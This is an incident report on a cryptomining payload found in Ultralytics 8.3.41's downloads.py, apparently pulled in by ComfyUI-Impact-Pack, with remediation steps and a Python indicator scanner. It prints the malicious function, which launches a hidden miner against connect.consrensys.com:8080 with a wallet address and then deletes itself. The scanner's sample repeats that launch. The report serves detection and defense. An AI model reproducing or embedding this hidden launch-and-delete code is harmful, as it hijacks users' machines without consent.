Potential Cryptocurrency Mining Attack Report: Security Issues in ComfyUI and Ultralytics

Overview

Recently, unauthorized cryptocurrency mining activity was suspected while using ComfyUI with the ComfyUI-Impact-Pack extension. The issue originates from malicious Python code in the Ultralytics package, which attempts to use system resources for unauthorized mining operations.

Problem Description

The incident involves a downloaded module, downloads.py, located in the following directory: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils

Malicious Code Sample

The following malicious code was detected:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

Behavior Analysis

  1. Permission Change: Uses os.chmod to make the file executable.
  2. Executing Malicious Commands: Runs the file with arguments that point it at the mining pool server connect.consrensys.com:8080.
  3. Process Hiding: Redirects the input, output, and error streams to DEVNULL and starts the process in its own session (os.setsid) to avoid detection.
  4. File Removal: Deletes the file after launching it to hide evidence.

Risk Assessment

Potential Impacts

  • High System Resource Usage: Mining significantly increases CPU/GPU load.
  • Hardware Wear: Prolonged high usage may shorten hardware lifespan.
  • Security Risks: Could endanger sensitive data or overall system security.

Source of the Issue

This malicious activity is linked to a suspicious version of the Ultralytics package, which appears to be installed as an automatic dependency of ComfyUI-Impact-Pack.

Installation Path

  • Suspicious Package: Ultralytics version 8.3.41
  • Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics

Trigger

Likely triggered by the install.py script in ComfyUI-Impact-Pack, which auto-installs dependencies.


Network Behavior Analysis

Target Domain

  • Domain Name: connect.consrensys.com
  • Port: 8080
  • Purpose: Suspected mining pool endpoint, likely using the Stratum protocol.

Evidence

  • Explicit mining pool connection details in the script.
  • Use of a private key (e.g., 4BHRQHF...) indicates an active mining account or operation.

Recommended Actions

  1. Uninstall Suspicious Packages:
    pip uninstall ultralytics ultralytics-thop

  2. Remove ComfyUI-Impact-Pack: Delete the related directory:
    ./ComfyUI/custom_nodes/ComfyUI-Impact-Pack

  3. Scan Your System: Use antivirus software and malware detection tools to ensure no ongoing threats.

  4. Monitor Network Connections: Check for external connections to connect.consrensys.com and block it in the firewall.

  5. Raise Awareness: Share this report with the maintainers of ComfyUI and Ultralytics to prevent further abuse.
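
A check for the indicators described in this report, as an added example that is not code from ComfyUI, Ultralytics, or the original report. It flags version 8.3.41 and looks in ultralytics/utils/downloads.py for the pool domain and the chmod, detached-launch, and self-delete calls; the helper names, the sample strings, and the 0.0.0 version are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path
SUSPICIOUS_VERSION = "8.3.41"  # version named in the report
INDICATORS = {  # patterns taken from the code sample in the report
    "pool_domain": re.compile(r"connect\.consrensys\.com"),
    "chmod_exec": re.compile(r"os\.chmod\([^)]*0o7"),
    "detached_exec": re.compile(r"preexec_fn\s*=\s*os\.setsid"),
    "self_delete": re.compile(r"os\.remove\(\s*path\s*\)"),
}
# Constructed, inert sample strings (never executed), used only by demo().
BAD_SAMPLE = ("def safe_run(path):\n    os.chmod(path, 0o770)\n"
              "    subprocess.Popen([path, '-o', 'connect.consrensys.com:8080'],\n"
              "                     preexec_fn=os.setsid)\n    os.remove(path)\n")
CLEAN_SAMPLE = "def safe_download(url):\n    return url\n"

def scan_source(text):
    """Return the sorted names of the indicators found in a source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def installed_version(site_packages):
    """Read the version from the ultralytics-<version>.dist-info directory name."""
    for entry in Path(site_packages).glob("ultralytics-*.dist-info"):
        return entry.name[len("ultralytics-"):-len(".dist-info")]
    return None

def audit(site_packages):
    """Check one site-packages directory and return its findings."""
    target = Path(site_packages) / "ultralytics" / "utils" / "downloads.py"
    hits = scan_source(target.read_text(errors="replace")) if target.is_file() else []
    version = installed_version(site_packages)
    return {"version": version, "version_flagged": version == SUSPICIOUS_VERSION,
            "indicators": hits}

def build_sample(root, version, body):
    """Hypothetical helper: create a fake site-packages tree for the demo."""
    (root / f"ultralytics-{version}.dist-info").mkdir(parents=True)
    (root / "ultralytics" / "utils").mkdir(parents=True)
    (root / "ultralytics" / "utils" / "downloads.py").write_text(body)
    return root

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        bad = audit(build_sample(Path(tmp) / "bad", SUSPICIOUS_VERSION, BAD_SAMPLE))
        ok = audit(build_sample(Path(tmp) / "ok", "0.0.0", CLEAN_SAMPLE))
    return bad, ok

if __name__ == "__main__":
    print(demo())
```

To check a real installation, pass audit() the site-packages directory that contains the ultralytics folder, for example the value returned by site.getusersitepackages(). An empty result only means these specific indicators are absent.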

Additional Evidence

  • Code Location: YourUserPath/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
  • Behavior Pattern: Unauthorized file execution, mining pool connection, and evidence cleaning.
  • Trigger Condition: Automatic dependency installation by ComfyUI-Impact-Pack.

Conclusion

This incident highlights the risks of insufficient dependency review in open-source projects, which can expose users’ systems to malicious attacks. The open-source community should adopt stricter review mechanisms to protect end-users.

